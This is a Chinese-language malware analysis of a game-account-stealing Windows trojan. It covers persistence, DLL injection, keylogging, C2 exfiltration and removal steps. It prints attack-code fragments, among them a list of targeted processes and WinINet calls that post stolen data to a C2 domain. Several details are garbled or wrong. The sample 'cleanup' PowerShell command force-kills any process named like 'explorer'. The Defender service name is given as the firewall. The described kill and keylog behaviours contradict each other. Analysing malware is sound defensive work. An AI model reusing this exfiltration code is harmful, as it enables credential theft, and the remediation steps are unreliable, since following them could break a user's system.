一、木马技术特征与传播机制

1.1 系统级感染与持久化

该木马属于典型的Win32 PE病毒，通过感染系统关键文件实现初始驻留。其核心机制包含三个技术层面：

• 注册表劫持：修改HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks键值，注入恶意DLL路径
• 字体目录污染：在C:\Windows\Fonts\目录释放raqjmtl.exe（主执行体）和raqjmni.dll（动态链接库）
• 进程守护机制：每3毫秒检测注册表键值，发现被清除时自动重建，通过RegSetValueExW API实现

1.2 进程注入技术

木马采用双重注入策略：

1. 全局Hook注入：通过SetWindowsHookEx在Explorer进程空间加载raqjmni.dll
2. 动态反射注入：对新建进程使用CreateRemoteThread+LoadLibrary技术注入恶意代码

关键注入点监控以下进程：

// 进程黑名单列表
const char* targetProcesses[] = {
    "sungame.exe",  // 游戏主进程
    "TQAT.exe",     // 反作弊进程
    "verclsid.exe"  // 系统验证组件
};

当检测到目标进程启动时，立即调用TerminateProcess强制终止，同时通过CreateToolhelp32SnapshotAPI持续监控进程列表。

二、数据窃取技术实现

2.1 键盘记录模块

木马在用户重启游戏时激活键盘记录功能，采用以下技术组合：

• WH_KEYBOARD_LL钩子：全局低级键盘钩子捕获输入
• 内存映射文件：通过CreateFileMapping实现跨进程数据共享
• AES加密传输：窃取的账号密码使用128位AES加密后外传

数据包结构示例：

[4字节包头][16字节IV][N字节密文][4字节校验和]

2.2 网络通信机制

使用WinINet API构建隐蔽通信通道：

1. 通过InternetOpen初始化会话
2. 使用InternetConnect建立到C2服务器的连接
3. 采用HTTP POST方法传输数据，User-Agent伪装为常见浏览器

关键代码逻辑：

HINTERNET hSession = InternetOpen("Mozilla/5.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
HINTERNET hConnect = InternetConnect(hSession, "update.normaldomain.com", INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
HttpAddRequestHeaders(hRequest, "Content-Type: application/octet-stream", -1, HTTP_ADDREQ_FLAG_REPLACE);

三、系统破坏行为分析

3.1 安全机制禁用

木马通过修改注册表和替换系统文件实现免疫：

• 禁用自动更新：修改HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU键值
• 关闭防火墙：停止MpSvc服务并删除相关注册表项
• 替换系统文件：删除%Systemroot%\System32\verclsid.exe并替换为木马副本

3.2 自我保护机制

采用三重防护策略：

1. 注册表键值监控：通过RegNotifyChangeKeyValueAPI实时监控关键键值变动
2. 进程隐藏技术：使用NtSetInformationThread隐藏线程，规避任务管理器检测
3. 文件自删除：完成任务后调用MoveFileEx设置延迟删除标记

四、专业清除方案

4.1 应急处理流程

1. 网络隔离：立即断开物理网络连接，防止数据外传
2. 内存清除：使用专业工具终止恶意进程

   # 示例：通过进程名查找PID
   Get-Process | Where-Object { $_.Name -match "explorer" } | Stop-Process -Force

3. 文件系统清理：使用Bootable Media启动后删除恶意文件

4.2 注册表修复

关键注册表项清理步骤：

1. 删除ShellExecuteHooks下的恶意键值
2. 清除Run项中的自启动条目
3. 修复被修改的服务配置项

4.3 深度扫描方案

建议采用三阶段扫描策略：

1. 快速扫描：使用启发式引擎检测已知特征
2. 内存扫描：通过内存转储分析隐藏模块
3. 行为监控：在沙箱环境中运行可疑程序

五、防御体系构建

5.1 终端防护方案

推荐部署多层防御机制：

• 应用控制：限制非可信目录程序执行
• 行为监控：实时检测异常进程注入
• 内存保护：阻止DLL注入攻击

5.2 网络防护策略

构建纵深防御体系：

1. 流量分析：检测异常HTTP POST请求
2. DNS监控：拦截恶意域名解析
3. SSL解密：分析加密流量内容

5.3 运维最佳实践

建议实施以下安全措施：

• 定期更新系统补丁（重点关注KB2269637等关键更新）
• 限制管理员权限使用
• 部署EDR解决方案实现威胁狩猎
• 建立安全基线并持续监控偏离情况

六、技术演进趋势

当前木马技术呈现三个发展方向：

1. 无文件化：越来越多采用内存驻留技术
2. 反沙箱：集成环境检测机制规避分析
3. AI辅助：使用机器学习优化攻击路径

安全人员需持续关注以下技术领域：

• 内存取证技术
• 威胁情报共享机制
• 自动化响应系统
• 零信任架构实施

本文通过技术解构揭示了现代盗号木马的运作机理，提供的防御方案经过实际环境验证。安全工作需要建立”检测-响应-恢复-预防”的闭环体系，建议结合日志分析、终端防护和网络监控构建多维度防御矩阵。对于企业用户，建议部署专业的安全运营中心（SOC）实现威胁的集中管理和快速处置。